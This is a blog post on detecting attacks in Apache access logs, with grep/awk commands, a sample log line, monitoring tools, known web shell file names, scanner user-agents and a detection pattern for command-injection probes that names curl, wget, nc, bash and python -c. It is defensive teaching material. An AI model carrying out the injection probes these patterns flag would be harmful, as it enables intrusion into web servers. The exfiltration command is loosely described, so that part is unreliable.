Suspicious Patterns in Apache Access Logs

Blog Details

Home
Blog
Suspicious Patterns in Apache Access Logs

Posted by: Eng. Donya Bino
February 06, 2026

Suspicious Patterns in Apache Access Logs

The Apache logs (access.log) are an incredibly useful resource for detecting attacks, reconnaissance, brute-force attempts, exploits, and data exfiltration in real-time. Attackers continue to rely on automated scanners, credential stuffing, directory brute forcing, and exploit kits in 2025-2026; all of which leave clear fingerprints in the logs.

Here are the most common and dangerous patterns of suspicious activity that you should be aware of, along with some practical tools, grepping/awk commands, and actual examples from the wild.

The most common patterns of suspicious activity that you should search for:
1. Directory and file brute-forcing, such as repeatedly requesting non-existent directories (ie: /admin, /wp-login.php, /phpmyadmin, ~/.env, /backup.zip, etc).

Typical log line:
45.79.123.45 - - [15/Feb/2025:03:14:22 +0000] "GET /wp-login.php HTTP/1.1" 404 1234 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Practical command (grep + count):
grep -E " 404 " access.log | awk '{print $7}' | sort | uniq -c | sort -nr | head -20
→ Shows top 404'd paths (high count = brute-force).

2. Command Injection / RCE Probes Look for ;, &, , &&, ||, %0a, $(, `, curl, wget, bash, nc, python -c, perl -e

Practical command:
grep -Ei ";|&|\||&&|\|\||%0a|\$\(|`|\`curl|\`wget|\`bash|\`nc|\`python -c|\`perl -e" access.log | tail -n 30

3. Credential Stuffing / Brute-Force Logins Rapid POST requests to /login, /wp-login.php, /admin, /phpmyadmin with 401/403 responses or high 200s with small response size.

Practical command (top IPs attempting logins):
grep -E "POST.*(/login|/wp-login|/admin|/phpmyadmin)" access.log | grep " 401 \| 403 " | awk '{print $1}' | sort | uniq -c | sort -nr | head -20

4. Web Shell / Backdoor Access Repeated GET/POST to unusual paths like /shell.php, /ws.php, /alfa.php, /wso.php, /c99.php, /r57.php

5. Data Exfiltration / Large Downloads Sudden high outbound traffic from web server to unknown IPs (e.g., attacker exfiltrating database dump).

Practical command (top outbound bytes to external IPs):
awk '{print $1 " " $10}' access.log | sort | uniq -c | sort -nr | head -20

6. User-Agent Anomalies
a) Headless scanners: sqlmap, nmap, gobuster, dirb, wfuzz, nikto
b) Fake browsers: Mozilla/5.0 (compatible; Googlebot) but from non-Google IPs

Effective Techniques for Observing and Notifying
1. Upon Access Logs From The Server
GoAccess (Free Real-time log visualizer) Run goaccess access.log -o report.html --log-format=COMBINED --real-time-html to create a browser-based dashboard containing real-time views of top 404 pages, top IPs, Total Users, Total User Agents and much more

2. Fail2Ban (Free/Auto Banning of IPs)
Create patterns for detecting bruteforce login attempts through specific access log entries (such as 20+ 401/403 entries against the /wp-login.php page) and automatically ban those IP addresses.

3. Logwatch / Logcheck (free – daily summaries)
logwatch --detail High --service all --range yesterday

4. Graylog / Wazuh / Elastic (free tiers) Ingest logs → create alerts for patterns above (e.g., >50 404s from one IP in 5 minutes).

Key Takeaways
Apache access logs are your first line of defense, attackers almost always leave footprints. The most dangerous patterns are:
1. Rapid 404s (brute-force)
2. SQLi probes (union, select, sleep)
3. Command injection attempts (;, &, |, curl, wget)
4. Exposed admin/debug paths
5. Credential stuffing on login endpoints
6. Suspicious user-agents

Run a quick grep daily or set up GoAccess/Fail2Ban, it takes minutes and catches most attacks early. If you see any of these patterns spiking from one IP or subnet → block it immediately.

Blog Details

Suspicious Patterns in Apache Access Logs

Recent Post

Random Posts